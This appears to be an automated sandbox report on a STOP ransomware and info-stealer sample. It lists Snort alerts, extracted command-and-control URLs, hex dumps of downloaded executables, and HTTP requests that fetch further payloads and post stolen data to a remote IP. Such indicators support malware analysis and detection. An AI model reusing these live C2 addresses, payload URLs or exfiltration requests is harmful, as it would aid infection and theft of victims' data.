Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49734 -> 58.151.148.90:80
Source: Traffic	Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49735 -> 190.218.33.18:80
Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49735 -> 190.218.33.18:80
Source: Traffic	Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 58.151.148.90:80 -> 192.168.2.4:49733
Source: Traffic	Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 58.151.148.90:80 -> 192.168.2.4:49734
Source: Traffic	Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49736 -> 58.151.148.90:80
Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49736 -> 58.151.148.90:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199673019888
Source: Malware configuration extractor	URLs: http://cajgtus.com/test2/get.php

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 23:44:27 GMTContent-Type: application/octet-streamContent-Length: 296448Last-Modified: Tue, 23 Apr 2024 19:19:16 GMTConnection: closeETag: "662809b4-48600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce d6 de 9e 8a b7 b0 cd 8a b7 b0 cd 8a b7 b0 cd 87 e5 6f cd 90 b7 b0 cd 87 e5 50 cd f6 b7 b0 cd 87 e5 51 cd a6 b7 b0 cd 83 cf 23 cd 83 b7 b0 cd 8a b7 b1 cd f8 b7 b0 cd 3f 29 55 cd 8b b7 b0 cd 87 e5 6b cd 8b b7 b0 cd 3f 29 6e cd 8b b7 b0 cd 52 69 63 68 8a b7 b0 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 47 05 fb 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 00 00 30 60 01 00 00 00 00 6d 40 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 61 01 00 04 00 00 00 d6 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 6a 01 00 64 00 00 00 00 40 60 01 66 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 60 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 e4 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 74 00 00 00 00 01 00 00 76 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 b5 5e 01 00 80 01 00 00 36 02 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 66 ef 00 00 00 40 60 01 00 f0 00 00 00 96 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Apr 2024 23:44:50 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Mon, 09 Oct 2023 19:50:06 GMTETag: "4ae00-6074de5a4a562"Accept-Ranges: bytesContent-Length: 306688Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 68 03 00 64 00 00 00 00 90 3e 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b8 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ff 3a 00 00 80 03 00 00 0e 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 69 63 00 00 00 00 05 00 00 00 00 80 3e 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 2f 00 00 00 90 3e 00 00 30 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic

HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 58.151.148.90 58.151.148.90
Source: Joe Sandbox View	IP Address: 104.21.65.24 104.21.65.24

Source: Joe Sandbox View	ASN Name: CableOndaPA CableOndaPA
Source: Joe Sandbox View	ASN Name: POWERVIS-AS-KRLGPOWERCOMMKR POWERVIS-AS-KRLGPOWERCOMMKR

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHDHJEBGHJKFIECBGCBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFHIIDHJEBFBFIDAKFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDHIEGCFHCGDGCAECBGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 5465Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBAFBGIDHCBFHIECFCBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIEBKKFHIEGCAKECGHJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBFBFCBFBKECAAKJKFUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDHCFCBGIDGHJJKJJDGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKKEHJKFCFCBFHIIDGDUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAEHDAKECGCAKFCFIJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEGCBFHJDGCBFHDAFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKKEHDHCAAAKFCBAKUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 118413Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCAUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDGDGIIDGCFIDHDHDHUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Code function: 1_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

1_2_0040CF10

Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic	HTTP traffic detected: GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic	HTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sdfjhuz.com
Source: global traffic	HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com

Source: build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: mJVVW85CnW.exe, 00000004.00000003.1787377163.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: mJVVW85CnW.exe, 00000006.00000003.1787622498.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: mJVVW85CnW.exe, 00000006.00000003.1787707351.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: api.2ip.ua

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHDHJEBGHJKFIECBGCBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 279Connection: Keep-AliveCache-Control: no-cache

Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: build2.exe, 00000008.00000003.2064352897.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: mJVVW85CnW.exe, 00000004.00000003.2159858920.000000000317F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe
Source: mJVVW85CnW.exe, 00000004.00000002.2333415250.00000000006AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe$run
Source: mJVVW85CnW.exe, 00000004.00000002.2333415250.00000000006AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe$runALn
Source: mJVVW85CnW.exe, 00000004.00000002.2333415250.00000000006AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe$runinstall020921_delay721_sec.exe0D
Source: mJVVW85CnW.exe, 00000004.00000002.2333415250.00000000006F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exerunM
Source: mJVVW85CnW.exe, 00000004.00000002.2333415250.0000000000706000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000002.2333415250.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000006.00000002.4155930809.00000000008C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test2/get.php
Source: mJVVW85CnW.exe, 00000006.00000002.4155930809.00000000008C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
Source: mJVVW85CnW.exe, 00000004.00000002.2333415250.0000000000668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true
Source: mJVVW85CnW.exe, 00000004.00000002.2333415250.0000000000668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trues
